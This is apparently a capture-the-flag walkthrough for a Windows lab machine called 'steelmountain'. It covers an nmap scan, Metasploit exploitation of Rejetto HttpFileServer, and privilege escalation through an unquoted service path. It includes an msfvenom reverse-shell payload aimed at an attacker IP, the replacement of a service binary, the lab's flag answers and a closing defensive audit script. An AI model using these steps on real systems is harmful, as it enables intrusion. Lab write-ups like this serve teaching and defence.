Nmap
nmap -sC -sV <MACHINE-IP>
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=steelmountain
| Not valid before: 2023-05-09T12:58:47
|_Not valid after: 2023-11-08T12:58:47
8080/tcp open http HttpFileServer httpd 2.3
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
=======================================================
=======================================================
1. Who is the employee of the month?
On navigating to http://<Machine-IP>:80 and inspecting the page source, we can find his name.
Ans: Bill Harper
=======================================================
=======================================================
1. Scan the machine with nmap. What is the other port running a web server on?
Ans: 8080
2. Take a look at the other web server. What file server is running?
We found that it is Http File Server, but that alone is not the answer; the room wants the product name.
Ans: Rejetto Http File Server
3. What is the CVE number to exploit this file server?
4. Use Metasploit to get an initial shell. What is the user flag?
1. Start Metasploit and search for the Rejetto module:
search rejetto
use 0
show options
Also, set the port to 8080 using the command set RPORT 8080
You will get a Meterpreter shell.
2. Let's move to bill's directory:
cd C:\\Users\\bill\\
3. Let's search for user.txt using the command search -f user.txt
4. cd into the directory and read the file:
cd C:\\Users\\bill\\Desktop\\
cat user.txt
We found the flag.
Ans: b04763b6fcf51fcd7c13abc7db4fd365
=======================================================
=======================================================
1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?
1. Open a new terminal and download the PowerUp PowerShell script (use the raw file URL; the github.com/.../blob/... link returns the HTML page rather than the script):
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
2. Now in Metasploit type the commands below to upload the file to the target machine (make sure to enter your download location):
upload <FILE_LOCATION>
load powershell
powershell_shell
3. Move to the directory where you uploaded the PowerShell file and then type the following commands:
. .\PowerUp.ps1
Invoke-AllChecks
Ans: AdvancedSystemCareService9
2. What is the root flag?
Let's create a payload using the command below (LHOST is the address of your own machine, where the listener runs, not the target's):
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
Stop the service and replace its binary with the payload:
sc stop AdvancedSystemCareService9
upload Advanced.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"
Received connection.
Ans: 9af5f314f57607c00fd09803a587db80
=======================================================
=======================================================
1. What powershell -c command could we run to manually find out the service name?
Format is "powershell -c "command here""
Ans: powershell -c Get-Service
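Get-Service only lists service names; the misconfiguration PowerUp reported earlier (an unquoted service path containing spaces) lives in the service's binary path, which Get-CimInstance Win32_Service exposes as PathName. The script below is an added example for administrators auditing their own hosts; it is not part of the original write-up and is not PowerUp code. It assumes an elevated PowerShell session on the Windows host being audited, and the function name Get-UnquotedServicePath is my own.

```powershell
# Added example (not from the original write-up): audit a Windows host for
# services whose executable path contains spaces but is not quoted, i.e. the
# same condition the PowerUp "unquoted service path" check flags.
# Assumes an elevated PowerShell session on the host being audited.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if ([string]::IsNullOrWhiteSpace($path)) { return }   # next service

        # Already quoted: nothing to report.
        if ($path.TrimStart().StartsWith('"')) { return }

        # Separate the executable from any arguments: keep everything up to ".exe".
        $exeIdx  = $path.ToLower().IndexOf('.exe')
        $exePath = if ($exeIdx -ge 0) { $path.Substring(0, $exeIdx + 4) } else { $path }

        # Only an executable path that itself contains a space is ambiguous
        # (C:\Windows\system32\svchost.exe -k netsvcs is unquoted but safe).
        if ($exePath -notmatch ' ') { return }

        [pscustomobject]@{
            Name      = $_.Name
            StartMode = $_.StartMode
            RunAs     = $_.StartName
            PathName  = $path
            # The fix is to quote the executable part; arguments stay outside the quotes.
            FixedPath = '"' + $exePath + '"' + $path.Substring($exePath.Length)
        }
    }
}

# Report findings, then print the remediation command for each one.
$findings = Get-UnquotedServicePath
$findings | Format-Table Name, RunAs, StartMode, PathName -AutoSize

foreach ($f in $findings) {
    # sc.exe requires the space after "binPath=" and the inner quotes escaped.
    $escaped = $f.FixedPath -replace '"', '\"'
    Write-Output ('sc.exe config "{0}" binPath= "{1}"' -f $f.Name, $escaped)
}
```

Run the printed sc.exe lines only after confirming each service's real executable location; quoting the path removes the ambiguity Windows resolves by trying each space-delimited prefix in turn. Services that run as LocalSystem with an unquoted path under a directory writable by non-administrators are the ones to fix first, and a file-integrity or EDR rule on the service binaries' directories gives detection for the replacement shown in the previous section.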